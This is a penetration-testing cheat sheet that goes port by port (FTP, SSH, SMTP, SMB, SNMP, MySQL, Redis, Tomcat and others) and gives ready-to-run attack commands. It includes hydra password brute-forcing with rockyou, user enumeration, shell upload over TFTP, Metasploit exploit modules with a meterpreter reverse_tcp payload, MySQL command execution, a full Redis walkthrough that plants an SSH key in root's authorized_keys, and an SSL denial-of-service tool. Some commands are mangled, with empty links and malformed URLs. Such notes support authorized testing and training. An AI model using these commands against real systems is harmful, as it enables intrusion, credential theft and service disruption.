# Common Ports ## 21 - FTP Many FTP servers allow anonymous users and might be misconfigured and give too much access. Always try to login as an anonymous user (`anonymous:anonymous`). It is also important to remember the binary and ascii mode. If you upload a binary file you to put the server in binary mode typing `binary` and the same with text-files, typing `ascii`. Connect to the FTP server: ``` ftp $ip ``` ``` nc $ip 21 ``` Anonymous FTP dump with Nmap: ``` nmap -v -p 21 --script=ftp-anon.nse $ip-254 ``` Enumerate: ``` nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip ``` Bruteforce ``` hydra -l user -P /usr/share/john/password.lst [ftp://:21$ip](ftp://:21$ip) ``` Bruteforce with metasploit: ``` msfconsole -q msf> search type: auxiliary login msf> use auxiliary/scanner/ftp/ftp_login ``` Vulnerability scan: ``` nmap --script=ftp-* -p 21 $ip ``` ## 22 - SSH You can find the version of SSH either by scanning it with nmap or by connecting to it with `nc`: ``` nc $ip 22 ``` User enumeration: ``` msf > use auxiliary/scanner/ssh/ssh_enumusers ``` ``` python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip ``` Bruteforce: ``` hydra -v -V -l root -P /usr/share/wordlists/rockyou.txt $ip ssh ``` Bruteforce with list of users: ``` hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh ``` ## 23 - Telnet Telnet is considered insecure mainly because it does not encrypt its traffic. Also a quick search in exploit-db will show that there are various RCE vulnerabilities on different versions that might be worth checking out. Bruteforce: ``` hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt $ip telnet ``` ## 25 - SMTP SMTP is a server to server service. The user receives or sends emails using IMAP or POP3. Those messages are then routed to the SMTP-server which communicates the email to another server. The SMTP-server has a database with all emails that can receive or send emails. We can use SMTP to query that database for possible email addresses. Notice that we cannot retrieve any emails from SMTP. We can only send emails. Connect to SMTP: ``` nc $ip 25 ``` ``` telnet $ip 25 ``` Possible commands to use after connection: ``` HELO - EHLO - Extended SMTP. STARTTLS - SMTP communicted over unencrypted protocol. By starting TLS-session we encrypt the traffic. RCPT - Address of the recipient. DATA - Starts the transfer of the message contents. RSET - Used to abort the current email transaction. MAIL - Specifies the email address of the sender. QUIT - Closes the connection. HELP - Asks for the help screen. AUTH - Used to authenticate the client to the server. VRFY - Asks the server to verify is the email user's mailbox exists. ``` Verify if root exists: ``` VRFY root ``` Ask the server if root belongs to a mailing list: ``` EXPN root ``` Check for commands: ``` nmap -script smtp-commands.nse $ip ``` Enumerate users: ``` smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip ``` Enumerate users with metasploit: ``` msf > use auxiliary/scanner/smtp/smtp_enum ``` Enumeration and vulnerability scanning: ``` nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip ``` Bruteforce: ``` hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V ``` Testing for open relay: ``` telnet $ip 25 EHLO root MAIL RCPT DATA Subject: Testing open mail relay. Testing SMTP open mail relay. Have a nice day. . QUIT ``` ## 53 - DNS Find name servers ``` host -t ns microsoft.com ``` Find email servers ``` host -t mx microsoft.com ``` Subdomain bruteforcing ``` for ip in $(cat list.txt); do host $ip.microsoft.com; done ``` Reverse dns lookup bruteforcing ``` for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found" ``` Zone transfer request ``` host -l microsoft.com ns1.microsoft.com ``` ``` dnsrecon -d [microsoft.com]() -t axfr ``` Finds nameservers for a given domain ``` host -t ns microsoft.com | cut -d " " -f 4 # ``` ``` dnsenum microsoft.com ``` Nmap zone transfer scan ``` nmap [microsoft.com]() --script=dns-zone-transfer -p 53 ``` Find the IP and authoritative servers ``` nslookup microsoft.com ``` ## UDP 69 - TFTP This is a FTP server but it is using UDP. If unauthenticated access is allowed with write permissions you can upload a shell: ``` tftp $ip tftp> ls ?Invalid command tftp> verbose Verbose mode on. tftp> put shell.php Sent 3605 bytes in 0.0 seconds [inf bits/sec] ``` ## 79 - Finger Users enumeration: ``` finger-user-enum.pl -U users.txt -t $ip ``` Enumeration with user: ``` finger username@$ip ``` ## 80 - HTTP Nikto: ``` nikto -h $ip ``` ``` nikto -h ``` Enumeration with Nmap: ``` nmap --script=http-enum -p80 -n $ip/24 ``` Nmap methods testing: ``` nmap --script http-methods --script-args http-methods.url-path='/test' $ip ``` Nmap vulnerability scanning: ``` nmap --script=http-vuln* $ip ``` Directory discovery: ``` wget gobuster dir -u -w Top1000-RobotsDisallowed.txt ``` ``` dirb $ip /usr/share/wordlists/dirb/common.txt ``` ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -u $ip ``` ``` gobuster dir -u []() -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e ``` ``` gobuster dir -u []() -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e ``` ``` cd /opt/dirsearch python3 dirsearch.py -y -e .php ``` Wfuzz web bruteforcer: ``` wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test ``` ``` wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ ``` ``` wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" ``` ``` wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ ``` Recurse level3 ``` wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ ``` Banner grabbing: ``` ./whatweb $ip # identifies all known services ``` Open a service using a port knock (Secured with Knockd): ``` for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done ``` WordPress Scan - WordPress security scanner: ``` wpscan --url $ip/blog --proxy $ip:3129 ``` RSH Enumeration - Unencrypted file transfer system: ``` msf > auxiliary/scanner/rservices/rsh_login ``` Bruteforcing authentication: ``` hydra $ip http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin ``` Test against SQLi: ``` sqlmap -u "[]()" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql ``` Coldfusion vulnerability scanning: ``` nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip ``` Bruteforce basic auth ``` hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path ``` ## 88 - Kerberos Kerberos is a protocol that is used for network authentication. Different versions are used by \*nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller. Test `MS14-068` Passive network sniffing: ``` kerbcrack ``` User enumeration: ``` nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip ``` Memory password extraction (pass the ticket attacks): `Mimikatz` ## 110 - POP3 This service is used for fetching emails on a email server. If the server has this port open then probably it is an email server and other clients on the network access it to fetch their emails. If you find usernames and passwords for email accounts you can check the mail using Telnet: ``` telnet $ip 110 +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready USER billydean +OK PASS password +OK Welcome billydean list +OK 2 1807 1 786 2 1021 retr 1 +OK Message follows From: jamesbrown@motown.com Dear Billy Dean, Here is your login for remote desktop ... try not to forget it this time! username: billydean password: PA$$W0RD!Z ``` ## 111 - Rpc Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC: ``` rpcbind -p 192.168.1.101 ``` Connect to an RPC share without a username and password and enumerate privileges: ``` rpcclient --user="" --command=enumprivs -N $ip ``` Connect to an RPC share with a username and enumerate privledges: ``` rpcclient --user="" --command=enumprivs $ip ``` ## 135 - MSRPC The Windows RPC Protocol. Enumerate (shows if any NFS mount is exposed): ``` rpcinfo -p $ip ``` ``` nmap $ip --script=msrpc-enum ``` ``` msf > use exploit/windows/dcerpc/ms03_026_com ``` ## 137 - NetBios Dumping the netbios table: ``` nmap -Pn -sUC -p137 $ip ``` ## 139/145 - SMB/Samba Enumeration: ``` nmblookup -A $ip ``` ``` enum4linux $ip ``` ``` enum4linux -a $ip ``` ``` smbclient //MOUNT/share -I $ip -N ``` ``` rpcclient -U "" $ip ``` Quick enumeration: ``` nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip ``` Quick vulnerability scan: ``` nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip ``` Full enumeration and vulnerability scan: ``` nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip ``` Full enumeration and vulnerability scan without brute force and dos: ``` nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip ``` All smb scripts authenticated scan: ``` nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip ``` Enumerate users: ``` nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14 ``` ``` python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip ``` Manual Null Session Testing: Windows → `net use \\\\$ip\\IPC$ "" /u:""` Linux → `smbclient -L //$ip` See version metasploit: ``` msf > use scanner/smb/smb_version ``` MultiExploit metasploit: ``` msf > use exploit/multi/samba/usermap_script ``` Mount: ``` smbclient //$ip/share -U username ``` Anonymous mount: ``` smbclient //$ip/share ``` Bruteforce: ``` hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb ``` Connecting: ``` smbclient -L $ip smbclient //$ip/tmp smbclient -L \\\\\\\\$ip\\\\ smbclient //$ip/ipc$ -U john ``` Connecting with PSExec in Metasploit: ``` msf > use exploit/windows/smb/psexec ``` Connecting with PSExec with credentials: ``` psexec.py DOMAIN/username:password@$ip ``` ## 161/162 - SNMP SNMP is a network protocol used for collection, organizing and exchanging information between network devices. It runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accesed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Within SNMP you can see running processes, open ports, users, windows version, installed software, etc. Fix SNMP output values so they are human readable: ``` apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf ``` Enumeration: ``` for community in public private manager; do snmpwalk -c $community -v1 $ip; done ``` ``` for community in public private manager; do snmpwalk -c $community -v1 $ip; done ``` ``` snmpenum $ip public windows.txt ``` Less noisy: ``` snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 ``` Based on UDP, stateless and susceptible to UDP spoofing: ``` nmap -sU --open -p 16110.1.1.1-254 -oG out.txt snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called public snmpwalk -c public -v 2c 10.1.1.1 # version 2 snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip snmp-check -t $ip -c public ``` SNMPv3 Enumeration: ``` nmap -sV -p 161 --script=snmp-info $ip/24 ``` Automate the username enumeration process for SNMPv3: ``` apt-get install snmp snmp-mibs-downloader wget ``` SNMP Default Credentials: ``` /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt ``` Bruteforce the community names: ``` onesixtyone -c dict.txt -i $ip ``` Against cisco using metasploit: ``` msf > use auxiliary/scanner/snmp/cisco_config_tftp ``` Scanning using metasploit: ``` msf > use auxiliary/scanner/snmp/snmp_login ``` ## 389/636 - LDAP This port is usually used for Directories. Ldap directory can be understood a bit like the windows registry or a database-tree, since directory here means more like a telephone-list than a folder. Ldap is usually used to store user infomration in corporate structures. Web apps can use ldap for authentication which means you can perform ldap-injections. Sometimes you can access ldap using an anonymous login and find some valuable data about users. Enumeration: ``` ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com" ``` ## 443 - HTTPS Encrypted version of the HTTP protocol. Always check for SSL vulnerabilites such as heartbleed. OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable OpenSSL 1.0.1g is NOT vulnerable OpenSSL 1.0.0 branch is NOT vulnerable OpenSSL 0.9.8 branch is NOT vulnerable First we need to investigate if the https-page is vulnerable to heartbleed: ``` sudo sslscan $ip:443 ``` ``` nmap -sV --script=ssl-heartbleed 192.168.101.8 ``` Open a connection ``` openssl s_client -connect $ip:443 ``` Basic SSL ciphers check: ``` nmap --script ssl-enum-ciphers -p 443 $ip ``` Exploiting with metasploit: ``` msf > use auxiliary/scanner/ssl/openssl_heartbleed ``` Notes: Look for unsafe ciphers such as Triple-DES and Blowfish A very complete tool for SSL auditing is [testssl.sh](http://testssl.sh), finds BEAST, FREAK, POODLE, heart bleed, etc... ## 443 - TLS Transport Layer Security, or TLS, is a widely adopted security protocol designed to facilitate privacy and data security for communications over the Internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS evolved from SSL. Enumerating supported protocols and cipher suites: ``` python prober.py $ip ``` Enumerating supported features and extensions: ``` nmap --script ssl-enum-ciphers -p443 ``` Certificate review: ``` nmap -p443 --script ssl-cert ``` You should validate that: * The X.509 subject common name (CN) is correct for the service * The issuer is reputable and certificate chain valid * RSA or DSA public key values are longer than 2,048 bits * DH public parameters are longer than 2,048 bits * The certificate is valid and has not expired * The certificate is signed using SHA-256 Vulnerabilites: * POODLE against CBC mode ciphers within SSL 3.0 * BEAST against CBC mode ciphers via TLS 1.0 * Byte biases in RC4 ciphers across all SSL and TLS protocol versions Validate if the key was generated with weak entropy: ``` nmap -p443 --script ssl-known-key $1 ``` Test failback: ``` openssl s_client -connect $ip -no_tls1_2 -fallback_scsv ``` Test Dos: ``` thc-ssl-dos $ip ``` ## UDP 500 - IPsec IPsec tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data. You can find hosts supporting ipsec with: ``` ike-scan -q $iprange ``` Validate the follow: * DH group can be insecure, allowing passive decryption. * Preshared key (PSK) might be cracked. * Obtaining the XAUTH once the PSK is known. * For more info, refer to: [`https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/`](https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-\(Part-1\)/) ## 587 - Submission Outgoing smtp-port If Postfix is run on it it could be vunerable to shellshock: [`https://www.exploit-db.com/exploits/34896/`](https://www.exploit-db.com/exploits/34896/) ## 631 - Cups Common UNIX Printing System has become the standard for sharing printers on a linux-network. You will often see port 631 open in your priv-esc enumeration when you run `netstat`. You can log in to it here: [**http://localhost:631/admin**](http://localhost:631/admin) You authenticate with the OS-users. Find version. Test **cups-config --version**. If this does not work surf to [**http://localhost:631/printers**](http://localhost:631/printers) and see the CUPS version in the title bar of your browser. There are vulnerabilities for it so check your searchsploit. ## 1433 - MsSQL Default port for Microsoft SQL database. Enumerate MSSQL Servers on the network: ``` msf > use auxiliary/scanner/mssql/mssql_ping ``` ``` nmap -sU --script=ms-sql-info $ip ``` Bruteforce MsSql with metasploit: ``` msf > use auxiliary/scanner/mssql/mssql_login ``` Gain shell using gathered credentials with metasploit: ``` msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp ``` Log in to a MsSql server: ``` root@kali:~/dirsearch# cat ../.freetds.conf [someserver] host = $ip port = 1433 tds version = 8.0 user=sa root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME ``` ## 1521 - Oracle DB Enumeration: ``` tnscmd10g version -h $ip tnscmd10g status -h $ip ``` Bruteforce the ISD with metasploit: ``` msf > use auxiliary/scanner/oracle/sid_brute ``` Connect to the database with `sqlplus` ## 1723 - PPTP Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers. Enumeration: ``` nmap –Pn -sSV -p1723 $ip ``` Bruteforce: ``` cat dic.txt | thc-pptp-bruter –u admin $ip ``` ## 2049 - NFS Network file system This is a service used so that people can access certain parts of a remote filesystem. If this is badly configured it could mean that you grant excessive access to users. Show Mountable NFS Shares: ``` nmap -sV --script=nfs-showmount $ip ``` Show all mounts: ``` showmount -e $ip ``` Mount a NFS share ``` mount $ip:/vol/share /mnt/nfs ``` ## 2100 - Oracle XML DB There are some exploits for this, so it is useful to check it out. You can use the default Oracle users to access to it. You can use the normal ftp protocol to access it. Some default passwords here: [`https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm`](https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm) Default logins → sys:sys / scott:tiger ## 3306 - MySQL Nmap scan: ``` nmap -sV -Pn -vv -script=mysql* $ip -p 3306 ``` Vulnerability scan: ``` sqlmap -u '' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all ``` Enumeration and vulnerability scanning: ``` nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306 ``` If Mysql is running as root and you have acces, you can run commands: ``` mysql> select do_system('id'); mysql> \\! sh ``` Always test the following: username: `root` password: `root` ``` mysql --host=$ip -u root -p mysql -h -u root mysql -h -u root@localhost mysql -h -u ""@localhost telnet $ip 3306 ``` Configuration files: ``` cat /etc/my.cnf ``` MySQL commands cheat sheet: [`http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html`](http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html) If with a shell, find login credentials for the database: ``` /var/www/html/configuration.php ``` ``` use auxiliary/scanner/vnc/vnc_login ``` Scan for no-auth: ``` msf > use auxiliary/scanner/vnc/vnc_none_auth ``` Meterpreter post exploitation module: ``` background use post/windows/gather/credentials/vnc set session X exploit ``` ## 5985 - WinRM This is the Windows Remote Management tool. It allows remote management, meaning that any server that has this service allows us to connect to it if you have credentials and permissions to use it. Connect: ``` cd /opt/ git clone evil-winrm -i $ip -u username -p password ``` ## 6379 - Redis Enumerate: ``` nmap -p6379 --script redis-info $ip ``` Client: ``` redis-cli -h $ip ``` #### Exploitation: 1. We first telnet to the server and check whether a successful connection is possible or not: ``` telnet $ip 6379 ``` 1. We then terminate the telnet session. Next, we generate our SSH key using the following command: ``` ssh-keygen -t rsa -C youremail@example. ``` 1. Then, we enter the file where we want to save it: ``` Enter the file in which to save the key (/root/.ssh/id_rsa): ./ida_rsa_ ``` 1. Our key is generated; now we need to write it on the server. To do that need to install `redis-cli`: ``` sudo apt install redis-tools ``` 1. Once it is installed, we go back to our generated key and add some random data before and after our key: ``` (echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key.txt ``` 1. Now we need to replace the keys in the database with ours. So we connect to the host using this: ``` redis-cli -h $ip ``` 1. Next we flush the keys using the following command: ``` redis-cli -h $ip -p 6350 flushall ``` 1. Now we need to set our keys into the database. We do this using the following command:: ``` cat redis.txt | redis-cli –h $ip –p 6451 -x set bb ``` 1. Once that's done, we need to copy the uploaded key into the `.ssh` folder; first, we check the current folder with this: ``` config get dir ``` 1. Now we change our directory to `/root/.ssh/`: ``` config set dir /root/.ssh/ ``` 1. Next, we change the name of our file using `config set dbfilename "authorized_keys"` and save using `save`. 2. Now we try to ssh into the machine: ``` ssh -i id_rsa username@$ip ``` ## 8080 - Tomcat (one of the most common) Tomcat suffers from default passwords. There is even a module in metasploit that enumerates common tomcat passwords. And another module for exploiting it and giving you a shell. Tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations: ``` msf > use auxiliary/admin/http/tomcat_utf8_traversal msf auxiliary(tomcat_utf8_traversal) > show actions ...actions... msf auxiliary(tomcat_utf8_traversal) > set ACTION < action-name > msf auxiliary(tomcat_utf8_traversal) > show options ...show and set options... msf auxiliary(tomcat_utf8_traversal) > run ``` Enumerating Apache Tomcat's usernames via malformed requests to j\_security\_check, which can be found in the web administration package. It should work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18: ``` msf > use auxiliary/scanner/http/tomcat_enum msf auxiliary(tomcat_enum) > show actions ...actions... msf auxiliary(tomcat_enum) > set ACTION < action-name > msf auxiliary(tomcat_enum) > show options ...show and set options... msf auxiliary(tomcat_enum) > run ``` Login to a Tomcat Application Manager instance using a specific user/pass: ``` msf > use auxiliary/scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > show actions ...actions... msf auxiliary(tomcat_mgr_login) > set ACTION < action-name > msf auxiliary(tomcat_mgr_login) > show options ...show and set options... msf auxiliary(tomcat_mgr_login) > run ``` ## 8080 - WebDav Test: ``` davtest -move -sendbd auto -url http://:8080$ip/webdav/ ``` ``` cadaver http://:8080$ip/webdav/ ``` ## 11211 - Memcached Enumerate: ``` nmap -p11211 --script memcached-info $ip ``` Extract data with metasploit: ``` msf > use auxiliary/gather/memcached_extractor ```